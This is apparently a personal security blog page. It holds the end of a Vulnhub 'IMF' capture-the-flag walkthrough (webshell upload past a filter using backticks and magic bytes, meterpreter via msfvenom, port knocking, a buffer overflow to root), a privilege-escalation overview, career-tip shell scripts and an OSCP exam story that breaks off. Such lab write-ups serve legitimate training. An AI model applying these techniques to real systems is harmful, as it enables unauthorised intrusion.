<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiaU2X31RAkgsfdzLg6r3m1JFTmy-gK2kWRZyNS2S4D9VZ_ywK1czZMN1Jc2ZjjIE-2NWBCbyvnmBdBhDa9GNBJ6pCZWOQsLHjyyleN5GMNjLiTqNdJ_yzYeWlf9L1WKT1XuF8IKFrI6c0A/s1600/sqlmap_command.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiaU2X31RAkgsfdzLg6r3m1JFTmy-gK2kWRZyNS2S4D9VZ_ywK1czZMN1Jc2ZjjIE-2NWBCbyvnmBdBhDa9GNBJ6pCZWOQsLHjyyleN5GMNjLiTqNdJ_yzYeWlf9L1WKT1XuF8IKFrI6c0A/s320/sqlmap_command.png" width="320" /></a></div>
<br />
The dump showed a new page that we hadn't seen before 'tutorials-incomplete' (no quotes). This page has a picture with a QR code. After scanning it, I got the fourth flag. The flag was 'uploadr942.php' so I navigated to that page next.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiajHHDQHm3RLGkl4XX8kNaROwvx1T4QOdyx5-4R5VEtSjOKcqCYtnsy6Au7yumCl7EyP2aFzXN_Gd4PjTe3YAddCkdr8YddabjkK47vQoBaHv04mLCQg4dYQQg3kJ1o0brxcXQy_0U67m-/s1600/uploadr942.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiajHHDQHm3RLGkl4XX8kNaROwvx1T4QOdyx5-4R5VEtSjOKcqCYtnsy6Au7yumCl7EyP2aFzXN_Gd4PjTe3YAddCkdr8YddabjkK47vQoBaHv04mLCQg4dYQQg3kJ1o0brxcXQy_0U67m-/s320/uploadr942.png" width="320" /></a></div>
<br />
First I tried to upload a text file and got an invalid file type error. After trying a couple different formats, I finally found the jpg was accepted as a valid filetype. There isn't any information on where the picture was uploaded to so, I thought I'd try the obvious options /images and /uploads. /images returned a blank page and /uploads was forbidden. So it exists? Going back to the result there is a comment in the source code that didn't exist before; unique hash? Possible filename? The /images/<hash>.jpg was not found. /uploads/<hash>.jpg worked! Holy crap! Ok, so now I needed something I could use to execute code with so I grabbed a webshell included in Kali Linux and attempted to upload the webshell renamed with the .php.jpg extension. Unfortunately, this didn't work because 'CrappyWAF detected malware. Signature: fopen php function detected'. Well screw you too IMF.<br />
<br />
The CrappyWAF also detected the 'system' function. ....seriously....and exec too....and shell_exec....and passthru...COME ON!<br />
<br />
I found a stackoverflow page that listed out different ways to execute code via php and BACKTICKS seems to be working. I edited my php-webshell to use backticks instead of system/exec/whatever calls and I only got 'Error: Invalid file data' instead of CrappyWAF errors. Two steps forward, one step back. Now, how to make it look like valid data...<br />
<br />
After trying for a couple hours I decide that jpg files are not going to work and I determine that png, bmp, and gifs are also acceptable formats. I used a technique I found online to write the magic number "FF D8 FF E0" to a fake gif file and then append straight php to the fake file. This FINALLY allows us to achieve code execution on the machine.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLtCq6H-isYSN0f7gO1CATMRKpNh8BCldIVoKBQgVXW_m-n0G-PTeqCQhjmMws4k9zScztDga3Nhak06MDzO8c5KTZ6dbV2dQLW96pnWnqAjYyVN3L1YmTyECtfQER62AbobXVLUY0n9_-/s1600/phpinfo.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLtCq6H-isYSN0f7gO1CATMRKpNh8BCldIVoKBQgVXW_m-n0G-PTeqCQhjmMws4k9zScztDga3Nhak06MDzO8c5KTZ6dbV2dQLW96pnWnqAjYyVN3L1YmTyECtfQER62AbobXVLUY0n9_-/s320/phpinfo.png" width="320" /></a></div>
<br />
<br />
HAHAHAHA FINALLY! I can cat the fifth flag and move forward...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjIe4UJffrDuSSO_QQeN3BFINFJtVaht_k0tWSJ6TKOJZS1ooO5feBqjfRsZw2LdwHwqDlDtzmrutzF5I7wD0EtUQguk5ooC0qkmQl4phOJokV51RLD0UUCZtjKlTj5U8bPsINrwsCBZStE/s1600/flag5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjIe4UJffrDuSSO_QQeN3BFINFJtVaht_k0tWSJ6TKOJZS1ooO5feBqjfRsZw2LdwHwqDlDtzmrutzF5I7wD0EtUQguk5ooC0qkmQl4phOJokV51RLD0UUCZtjKlTj5U8bPsINrwsCBZStE/s320/flag5.png" width="320" /></a></div>
The fifth flag reveals the phase 'agentservices'. Hmmm....after perusing around the box for a bit, I found ssh listening on port 22 and an unknown service listening on port 7788. (I found out later that the agent services was referring to the .htaccess file that allows us to execute php from a .gif). I also found /usr/local/bin/agent and /usr/local/bin/access_codes while looking for files related to 'agent' on the machine. The /usr/local/bin/agent turns out to be an ELF executable and the access_codes file says 'SYN 7482,8279,9467' which looks like port knocking ports to me.<br />
<br />
I am able to port knock the machine using nmap and then I can simply nc to the machine on port 7788 and the service is now available! So, from our php webshell I can 'cat' the contents of the 'agent' executable, but I need to find out what the Agent ID means.<br />
<br />
First I copy the agent executable back to my local workstation and I run strings, nothing jumps out about the Agent ID but, I can see there are menu options that include Extraction Points, Request Extractions and Submitting a report. In addition, there are numerous cities and places, i'm assuming, to request an extraction.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj7WZ2wn__5NQHVUkdUorxN9l-cb6jfQ6IxnUZI11mzLPs2ieINsWae5VvjT_PE-PSUQ966jfKb2e-gjdKMPn4ouyEq4fMHcmLPKO0AxfLGKGTNreVxI5pBXhaNSqKXgnF5FrnPfXTqsPjF/s1600/agent_dump.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj7WZ2wn__5NQHVUkdUorxN9l-cb6jfQ6IxnUZI11mzLPs2ieINsWae5VvjT_PE-PSUQ966jfKb2e-gjdKMPn4ouyEq4fMHcmLPKO0AxfLGKGTNreVxI5pBXhaNSqKXgnF5FrnPfXTqsPjF/s320/agent_dump.png" width="320" /></a></div>
<br />
After running into some issues and desiring a more robust prompt, I switched over to meterpreter and executed an msfvenom payload via the php backdoor shell and now have a meterpreter shell on the machine.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhtkk4LEXFCvlM8Hvo1bVQax_L0HVbUDre6-CnIkUysm3Qp1XzD-3RXHmzt82LAzz6cQcG5Ho3RlielatR6RsLMgvlnSQYQY3UbRQ2GlT_87hzMDRMZtecQZEbptLgyqcOgGI43VoKBiaTr/s1600/meterpreter.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhtkk4LEXFCvlM8Hvo1bVQax_L0HVbUDre6-CnIkUysm3Qp1XzD-3RXHmzt82LAzz6cQcG5Ho3RlielatR6RsLMgvlnSQYQY3UbRQ2GlT_87hzMDRMZtecQZEbptLgyqcOgGI43VoKBiaTr/s320/meterpreter.png" width="320" /></a></div>
<br />
Finally, I am able to run ltrace on the agent executable and we can easily see the 'strncmp' call made with my provided value 'a' and the actual value needed '48093572'.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDSCOE7UcpRdPRMFgTdQTBHatNseG_Cl3UwYkwPO1LRhRsmTFuYgyfCA-p4RmsilPLALog3AbDr02gGcIu-Wjv7V_z0d-IY4CIanQkGJwAolPLAJwIm4GeArzEL-JgZe5GD3o_B0xTyzwg/s1600/ltrace.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDSCOE7UcpRdPRMFgTdQTBHatNseG_Cl3UwYkwPO1LRhRsmTFuYgyfCA-p4RmsilPLALog3AbDr02gGcIu-Wjv7V_z0d-IY4CIanQkGJwAolPLAJwIm4GeArzEL-JgZe5GD3o_B0xTyzwg/s320/ltrace.png" width="320" /></a></div>
<br />
Ok now it looks like we have access to this executable and from our previous recon on the box we know this executable is running as root so, I think it's time to design a BUFFER OVERFLOW!!! *epic music*<br />
<br />
So after a little fuzzing, I found that the Report (option 3) is able to be corrupted with a string length of 1024 "\x90"s so now, I need to find where the buffer overwrites EIP. To do this we can use pattern_create.rb. We found where EIP crashes and determined that the offset is 168 bytes into the buffer. To confirm this, we edit bytes 168-171 (inclusive) to be unique and when the program crashes, we should see our exact bytes that caused the application to crash.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyc_ELOcZaZcQpY1r4mdhGhSHEWw-Ar8-j_CVrimEkq35CUPHJy0H1UdY7EdaeuhDdMU50HZQyBQWkW98X5DQw3HbDyVBzXiVj56cYHW1PotPl_AIYa5i6kvMyXb8x3PnRokYmhJcdeWQh/s1600/buffer_overflow_AB_string.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyc_ELOcZaZcQpY1r4mdhGhSHEWw-Ar8-j_CVrimEkq35CUPHJy0H1UdY7EdaeuhDdMU50HZQyBQWkW98X5DQw3HbDyVBzXiVj56cYHW1PotPl_AIYa5i6kvMyXb8x3PnRokYmhJcdeWQh/s320/buffer_overflow_AB_string.png" width="320" /></a></div>
<br />
Now that we've confirmed we can write to EIP, let's see which registers are also overwritten. It looks like eax is holding a pointer to an array of data that was overwritten by our pattern so let's investigate that more thoroughly.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-e3KoenCT2bkqz-Z4EgsXxBgguXRVl3ubC4clMdeOajgFxsj16R7FP9XIMM1OoG6oOEhirZqWYx5sSjdq36DXOI2H4VKZ9jF2b5gGoMjOR5eLEsOrbRFEl08DYfeK14fEUTw-qScD0eBH/s1600/eax_register_find_pattern.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-e3KoenCT2bkqz-Z4EgsXxBgguXRVl3ubC4clMdeOajgFxsj16R7FP9XIMM1OoG6oOEhirZqWYx5sSjdq36DXOI2H4VKZ9jF2b5gGoMjOR5eLEsOrbRFEl08DYfeK14fEUTw-qScD0eBH/s320/eax_register_find_pattern.png" width="320" /></a></div>
<br />
So again, we used pattern_create.rb to create a pattern and put it into the application, and then we use pattern_offset.rb to calculate the offset of the buffer! Which is....<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXLEcYvRLlJ4p2W7O4epID8ji7EdVzZ8BnluonLwoXQpiErwUNS26gUP6tBgf0fPYDKSCg0xh60IWJfZHZZ0HHsHEOm7dq-2VHmR74eDiOvvsuE8_Nl2BcDTx5rmBcJwSQeAOhtpLB1iGk/s1600/eax_offset.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXLEcYvRLlJ4p2W7O4epID8ji7EdVzZ8BnluonLwoXQpiErwUNS26gUP6tBgf0fPYDKSCg0xh60IWJfZHZZ0HHsHEOm7dq-2VHmR74eDiOvvsuE8_Nl2BcDTx5rmBcJwSQeAOhtpLB1iGk/s320/eax_offset.png" width="320" /></a></div>
<br />
...offset 0? That seems awfully nice. Now, I need to find someway to get code execution to eax. Fortunately, there is a site called ropshell that you can upload a binary to and it will give you back some options including one for 'call eax' located at offset 0x00000563. You need a little more computer architecture knowledge to know that this will be located at 0x08048563 in memory (most linux executables are loaded at base address 0x08048000). Lastly, we just need shellcode which is easily generated by msfvenom. Now we have the exploit!<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTvOKB1T307KK7jxTmJ2_oauHpzgt6BJHmm5nEeEwFMHS8IRYUh4rAjsh6H-WXe8GEFPBDG04nxRDLFi9_HnxjKVf791nw8SxhULW-Jia7J8DjpyA6jRywNwaI6-NkbNAn7n1uaVxKZa3D/s1600/imf_exploit_py.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTvOKB1T307KK7jxTmJ2_oauHpzgt6BJHmm5nEeEwFMHS8IRYUh4rAjsh6H-WXe8GEFPBDG04nxRDLFi9_HnxjKVf791nw8SxhULW-Jia7J8DjpyA6jRywNwaI6-NkbNAn7n1uaVxKZa3D/s320/imf_exploit_py.png" width="320" /></a></div>
<br />
Let's try and see if it works! So, this specific script didn't work, but the format stayed the same. I had to add some time delays and I switched from meterpreter shellcode to regular shellcode. Here is the actual script that worked followed by my root privs.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4rubTyzSqlAGqeL8owxuN5wGxth-UoOt0AjBhA2sO34XARO1gyYcqJQ6qMtvL2hVypXdYtQoB1kOSHQG7jXIIgGMQTYnz_5Coo5m35Kw4HL8hMFvGSskGy_oRCSlG6bYUKBvoYU9el0dN/s1600/actual_imf_exploit.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4rubTyzSqlAGqeL8owxuN5wGxth-UoOt0AjBhA2sO34XARO1gyYcqJQ6qMtvL2hVypXdYtQoB1kOSHQG7jXIIgGMQTYnz_5Coo5m35Kw4HL8hMFvGSskGy_oRCSlG6bYUKBvoYU9el0dN/s320/actual_imf_exploit.png" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5KPTZrcrp8ksPf0gISfw0KsMyl9yB4h45fHiH5VfFLw33IPjZWMAoeOuDQin2B0do-oVXfYzBnRS0zWrG5YnTDf04Oedh4KjSTbXAVdhnGE3cozqHx7jvJtHgyTHuMC6cDc3YbPA7neSP/s1600/got_root.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5KPTZrcrp8ksPf0gISfw0KsMyl9yB4h45fHiH5VfFLw33IPjZWMAoeOuDQin2B0do-oVXfYzBnRS0zWrG5YnTDf04Oedh4KjSTbXAVdhnGE3cozqHx7jvJtHgyTHuMC6cDc3YbPA7neSP/s320/got_root.png" width="320" /></a></div>
<br />
Well, now all that remains is to see the final flag and wrap up this walkthrough! Drum roll please......................<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhh68yX_2lpDNp9lUYWM9msbHdr8eJfsRHp8jsnCsTo0v_rHmPPMD1F4IIiMjpkrNOYFOMbLqcprqZmdl2h5s6ybYUhfYsE2DRf5eTjcU6Xz_L7MkaW56t_fTP7EPXEQ6itNeRS7wn4UVO2/s1600/the_end.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhh68yX_2lpDNp9lUYWM9msbHdr8eJfsRHp8jsnCsTo0v_rHmPPMD1F4IIiMjpkrNOYFOMbLqcprqZmdl2h5s6ybYUhfYsE2DRf5eTjcU6Xz_L7MkaW56t_fTP7EPXEQ6itNeRS7wn4UVO2/s320/the_end.png" width="320" /></a></div>
<br />
This was an awesome exercise and I'd like to give credit to all the website I used while researching how to exploit this box. I'd also like to say I did compare my walkthrough to the other walkthroughs already posted on Vulnhub.com and it was very fun to see alternate and similar techniques used. All thoughts and comments are the authors and do not represent the thoughts or comments of anyone else. I hope you enjoyed this walkthrough! -Hack Responsibly. Hack Professionally.<br />
<br />Austinhttp://www.blogger.com/profile/01968094133955654942noreply@blogger.com3tag:blogger.com,1999:blog-918525977206186619.post-66077332274610866342016-10-29T14:40:00.000-04:002016-10-29T14:40:18.684-04:00Getting to the root@hostname:~# of the problemWhat is privilege escalation?<br />
<br />
Let's look at the subject in a less technical fashion first. What does it mean to elevate one's privileges? It's being able to do something that you do not have privileges for, for example: The wife of a powerful CEO can elevate her privileges by convincing her husband to do something for her that she normally couldn't do. This could be money, power, valuable items, etc.<br />
<br />
In terms of hacking or computer security (two sides of the same coin) we either need a program to execute our own code with higher privileges or we need to prevent any program from executing user-supplied code at higher privileges than the user is allowed; or more specifically, the hacker is allowed.<br />
<br />
Whenever someone asks about or googles for 'linux privilege escalation' there is one blog that everyone cites: https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/. This blog post is very thorough and hits on an important point; <b>Enumeration is key</b>. You only need one avenue by which to raise your privileges and there are many, many different ways to do so.<br />
<br />
I recommend going through g0tmi1k's blog and understanding what each command does and how it can be used for privilege escalation. Once you understand the methodology, there are a few things I personally recommend when attempting to escalate your privileges.<br />
<br />
<ol>
<li>'sudo su root' - This is by far the easiest privilege escalation I've ever seen but, when you have sudo privileges you are simply using them to change your user to the root user and boom! You're root.</li>
<li>Cracking root user privileges. If you don't believe that random passwords are used for root accounts, then that means a user set the root password and can potentially be brute forced. However, this is obnoxiously noisy, just for your reference. </li>
<li>Use the Linux Exploit Suggester built into Kali Linux to find exploits based on the kernel version. https://github.com/PenturaLabs/Linux_Exploit_Suggester</li>
<li>Use the Linux Privilege Checker which automates G0tmi1k's blog enumeration process and suggest potential exploits. <cite class="_Rm">https://www.securitysift.com/download/linuxprivchecker.py </cite></li>
</ol>
Lastly, the difference between a script kiddie and a professional hacker will be the depth of understanding of these scripts, methodologies, and privilege escalation exploits. If one doesn't work on a kernel it says it should work with, learn why.<br />
<br />
Hack Responsibly. Hack Professionally. Austinhttp://www.blogger.com/profile/01968094133955654942noreply@blogger.com0tag:blogger.com,1999:blog-918525977206186619.post-30693794509316173632016-10-14T07:00:00.000-04:002016-10-14T07:00:08.827-04:00prof_dev5.sh#!/bin/bash<br />
<br />
echo "Make a plan for your Professional Development!"<br />
echo ""<br />
echo "Anything worthwhile rarely succeeds without proper planning, why should your career and professional development be any different? The first step to developing a great plan is to establish a baseline. Where are you currently? What do you have? Skills, knowledge, abilities, connections, and anything else you can enumerate."<br />
echo ""<br />
echo "The next step is to figure out where you want to be. Where do you see yourself in 1, 5, 10 years? Don't think of where you should be, or where you ought to be, or where you have always thought you would be. Think of your wildest, craziest passion and strive for it. This is where you want to be."<br />
echo ""<br />
echo "These dreams may change and that is OK; it is OK to change what you want at different points in your life. What should not change is your drive to achieve your passion, no matter what it is."<br />
echo ""<br />
echo "Lastly, we connect the current dots with the future dots with specific, concrete, implementable steps. Some steps could be as simple as a flick of a switch or throwing away an old picture. On the contrary, some decisions can be life altering such as quitting your job, selling your home, or moving across the country. No decision should be made lightly but, just because they are difficult doesn't mean they are bad decisions. You will never be happier than when you are pursuing and accomplishing your passion!"<br />
echo ""<br />
echo "So how can you connect the dots? How can you plan for your success? The steps are simple but, the change can and will. be. hard. Embrace it and strive for your passion."<br />
echo ""<br />
<div>
echo "Think about your plan this weekend and let me know how it goes by commenting on this post, or sending me a tweet @anorblet"<br />
echo ""</div>
<div>
echo "Check out more posts at professionalhackerdigest.blogspot.com! Hack Responsibly, Hack Professionally"</div>
<br />Austinhttp://www.blogger.com/profile/01968094133955654942noreply@blogger.com0tag:blogger.com,1999:blog-918525977206186619.post-80722259120386260622016-10-13T07:00:00.000-04:002016-10-13T07:00:22.383-04:00prof_dev4.sh#!/bin/bash<br />
<br />
echo "Humility is a top quality"<br />
echo ""<br />
echo "No individual knows everything and there is a 100% chance that in the past and in the future, we have/will said/say something wrong, incorrect, or abrasive to someone else. In this moment, remember humility."<br />
echo ""<br />
echo "It is OK to be wrong and make mistakes both professionally and personally and in fact, we can use them to our advantage when we admit that we were wrong. As Dale Carnegie says in his book, 'If you are wrong, admit it quickly and emphatically'."<br />
echo ""<br />
echo "For some reason, some people refuse to admit they were wrong. They refuse to admit they are wrong about reports, wages, resumes, and big and small decisions alike. In my experience, the damage comes from hiding, re-framing, or ignoring mistakes; the damage does not come exclusively from making mistakes."<br />
echo ""<br />
echo "You should always strive to be better, make fewer mistakes, and accept responsibility for the mistakes you do make. No matter which mistakes you make, admit you were wrong and be better in the future."<br />
echo ""<br />
echo "Embrace your humility and accept responsibility for your mistakes and definitely your successes!"<br />
echo ""<br />
<div>
echo "Try using this tactic this week and let me know how it goes by commenting on this post, or sending me a tweet @anorblet"<br />
echo ""</div>
<div>
echo "Check out more posts at professionalhackerdigest.blogspot.com! Hack Responsibly, Hack Professionally"</div>
<br />Austinhttp://www.blogger.com/profile/01968094133955654942noreply@blogger.com0tag:blogger.com,1999:blog-918525977206186619.post-18376178299365824162016-10-12T07:00:00.000-04:002016-10-12T07:00:16.329-04:00prof_dev3.sh#!/bin/bash<br />
<br />
echo 'What is in a name?'<br />
echo ""<br />
echo "Interestingly enough, EVERYTHING! People love hearing their own names. It's a sweet note in their ears, soft touch on their skin, and a warm bite of food in their mouths. Everyone loves to hear their own name."<br />
echo ""<br />
echo 'Make a genuine effort to remember peoples names when you meet them because it can and will pay dividends 100x over in the future. Clients will warm up to you faster if you greet them after a week by saying "Hey John, how was the weekend with the in-laws?" rather than "Hello again, lets jump into business".'<br />
echo ""<br />
echo 'When I first learned this trick, I struggled to use it because I thought it was ridiculous. I thought that people would either like you or not like you and that was just the hand you were dealt. Eventually, I combined remembering names with smiling and it was incredible how many MORE people seemed to be genuinely pleased to see me.'<br />
echo ""<br />
echo "This is not a panacea for the jackasses, the jerks, or the rudest people; everyone has to deal with their reputation. This is also not foolproof, not everyone will like you and that is OK. This tip is meant to increase and build upon your desire to develop professionally."<br />
echo ""<br />
echo 'Use this tip regularly until it becomes second nature and watch the scales slowly tip in your favor when meeting and remembering new people, clients, supervisors, investors, friends, or anyone else.'<br />
echo ""<br />
echo "In conclusion, the simple act of remembering names will help you in the future. I can't tell you how, where, or to what end but, I would not doubt for a second its usefulness."<br />
echo ""<br />
<div>
echo "Try using this tactic this week and let me know how it goes by commenting on this post, or sending me a tweet @anorblet"<br />
echo ""</div>
<div>
echo "Check out more posts at professionalhackerdigest.blogspot.com! Hack Responsibly, Hack Professionally"</div>
<br />Austinhttp://www.blogger.com/profile/01968094133955654942noreply@blogger.com0tag:blogger.com,1999:blog-918525977206186619.post-78126602002668364492016-10-11T07:00:00.000-04:002016-10-11T07:00:03.892-04:00prof_dev2.sh#!/bin/bash<br />
<br />
echo 'Three Meeting "Hacks"'<br />
echo ""<br />
echo 'I was lucky enough to participate in a meetings course recently and there were three main points I took away from the course'<br />
echo ""<br />
echo 'Main point 1: Every meeting needs an agenda'<br />
echo 'Main point 2: Every meeting needs an outcome or decision'<br />
echo 'Main point 3: Every meeting needs a parking lot'<br />
echo ""<br />
echo 'Every meeting needs an agenda so both the attendees and the meeting host know how the meeting should be progressing. In addition, it helps keeps everyone accountable for the initial time table set for the meeting.'<br />
echo""<br />
echo 'Every meeting needs an outcome or a decision to be made otherwise, why else would you have a meeting? This outcome or decision can be as simple as "Everyone is informed of a new product" or as complicated as "We will decide on the number of hours, pay rate, and quantity of interns for the next 7 years". This is also how anyone can determine the success or failure of a meeting.'<br />
echo ""<br />
echo 'Lastly, every meeting needs a parking lot. A parking lot is a separate place (paper, whiteboard, notebook, etc) for ideas that aren't directly relevant to the meeting but, shouldn't be forgotten. For example, if you are talking about the budget in a meeting and an idea for a company picnic comes up, put that idea in the parking lot. This keeps the meeting on topic and allows for everyone's ideas to be heard. Don't underestimate the effectiveness of this idea!'<br />
echo ""<br />
<div>
echo "Try using this tactic this week and let me know how it goes by commenting on this post, or sending me a tweet @anorblet"</div>
<div>
echo ""</div>
<div>
echo "Check out more posts at professionalhackerdigest.blogspot.com! Hack Responsibly, Hack Professionally"</div>
<br />
<br />Austinhttp://www.blogger.com/profile/01968094133955654942noreply@blogger.com0tag:blogger.com,1999:blog-918525977206186619.post-80190126347504986142016-10-10T14:54:00.000-04:002016-10-10T14:57:42.662-04:00prof_dev1.sh#!/bin/bash<br />
<div>
<br /></div>
<div>
echo "The best way to win arguments, is to avoid them."<br />
echo ""</div>
<div>
echo "One thing I see A LOT is arguments where people are just shouting at each other. Sometimes they have differing opinions, and they should be discussing them, and other times they are just yelling to be heard."<br />
echo ""</div>
<div>
echo "Everybody wants to be heard."<br />
echo ""</div>
<div>
echo "If an argument is unstructured, aggressive, switching from non-personal to personal attacks, or downright silly, see if you can't isolate who is trying to be heard in this argument and what they are trying to have heard."<br />
echo ""</div>
<div>
echo 'Quoting <i>How To Win Friends & Influence People </i>and quoting Benjamin Franklin within the book, "If you argue and rankle and contradict, you may achieve a victory sometimes; but it will be an empty victory because you will never get your opponents good will."'</div>
<div>
echo ""</div>
<div>
echo "Look for ways to agree, hear your opponent, acknowledge what they are saying but, most importantly, avoid arguments in the first place."</div>
<div>
echo ""</div>
<div>
echo "Try using this tactic this week and let me know how it goes by commenting on this post, or sending me a tweet @anorblet"<br />
echo ""</div>
<div>
echo "Check out more posts at professionalhackerdigest.blogspot.com! Hack Responsibly, Hack Professionally"</div>
Austinhttp://www.blogger.com/profile/01968094133955654942noreply@blogger.com0tag:blogger.com,1999:blog-918525977206186619.post-79394297415038326002016-10-10T14:53:00.000-04:002016-10-10T14:56:54.364-04:00Shell Scripting Professional Development TipsGood afternoon everyone,<br />
<div>
<br /></div>
<div>
This week I decided to release a daily shell script/blog post with a professional development tip. The idea is that you can read the blog post here and you can copy the text and run it as a shell script on your linux distro as a reminder. Set it as a cron job or run it when you need it. Show it to your friends and coworkers! </div>
<div>
<br /></div>
<div>
I will be releasing the first one today immediately after posting this and they follow the naming pattern of prof_dev{number}.sh. Enjoy all week long and check back often to see updates!</div>
<div>
<br /></div>
<div>
-Hack Responsibly, Hack Professionally</div>
Austinhttp://www.blogger.com/profile/01968094133955654942noreply@blogger.com0tag:blogger.com,1999:blog-918525977206186619.post-66932782290185093172016-10-06T21:11:00.001-04:002016-10-06T21:11:20.196-04:00My OSCP StoryGood evening,<br />
<br />
I'm going to deviate from my normal professional development and technical discussions to talk about an accomplishment I'm rather proud of, I passed the OSCP test! For those of you who don't know what OSCP is, check out the website here: https://www.offensive-security.com/information-security-certifications/oscp-offensive-security-certified-professional/<br />
<br />
First I want to say that this blog is completely my own opinion and does not accurately reflect the views of any past, present, or future employees nor does it represent the views of the Offensive-Security team.<br />
<br />
I started the course, Penetrating Testing with Kali Linux (or PWK), at the end of July with 60 days access to the lab. I think, given my background, this was sufficient time but, the amount of time you should purchase DEFINITELY depends on your background. Do not let the price tag fool you, the extra time you spend studying and learning will definitely help you pass the exam. The lab is full of machines with many different configurations, operating systems, and vulnerabilities that you, as the student, need to figure out how to exploit. Some exploits will land you on a root shell immediately and some will only land you with a low-privilege shell. If you have a low privilege shell then you need to escalate your privileges to root or Administrator (Linux vs Windows).<br />
<br />
There are something like 50 virtual machines in this practice lab and the learning opportunities are figuratively unlimited; there is typically more than one way to exploit most systems. Rumor has it that if you are able to exploit every box in the public network (there are other hidden networks) except for Pain, Sufference, and Humble then you're good to go for the exam BUT there is no proof to this and the amount of learning required to pass the exam is different for everyone.<br />
<br />
The exam consists of 5 boxes of varying points values and students need 70/100 points to pass the exam. So now I'll give my experience with the labs and exam.<br />
<br />
My PERSONAL experience with the labs was awesome. I loved exploiting every single box and with every successful exploit I felt like I understood the process, exploits, and methodology just slightly better. I think I ended up exploiting around 30-35 of the available boxes (life got in the way of the rest of them) but, the most important thing for me was to understand the methodology. I really started to understand how Remote File Inclusion/Local File Inclusion (RFI/LFI) exploits were used, I really understood what to look for with privilege escalations. I became more familiar with metasploit. I was able to understand and modify exploits for my own use when necessary. These and other skills are explained in the course material but, its up to you to take those examples, do them, understand them, experiment with them, and master them to be used during the lab and on the exam. I can't believe it took this long to mention it but, you will learn to "Try Harder" in this course. One common misconception, in my opinion, is that the course material is everything you need to pass the exam. This is both true and not true. It is true that you have every tool you need to exploit any machine. It is not true that you know how to use each and every tool exactly as necessary to exploit any machine. When you are frustrated, angry, and all the admins will say is "Try Harder", take it to heart and try harder. You will be so glad you did.<br />
<br />
Now, for my exam story. I thought I had scheduled my exam for Friday Sept 30th at 5am. When I woke up to take the exam, I never got the email so I contacted support. They had no record of my registration and even though I was frustrated, I scheduled my ACTUAL exam for October 3rd at noon. I spent the weekend playing around with virtual machines from VulnHub just to whet my appetite for the OSCP exam. Monday comes around and I get up, get ready, and at noon I get the exam email with my connection details. I spun up my PWK virtual machine and it would not connect to the internet. WHAT. I tried to configure the virtual machine adapters and it wasn't working. So, after 15 minutes, I got my laptop, which was conveniently also running Kali Linux, and I was able to connect to the exam network and start my exam. I looked at the point values for the machines and started with the lowest valued machine to get in the swing of things. I was able to exploit the first machine in about an hour. BOOM 1/5. I then moved onto the next machine and after about three hours I got the second machine completely. BOOM 2/5. I worked on the third box and after another three hours or so, I got the next box. 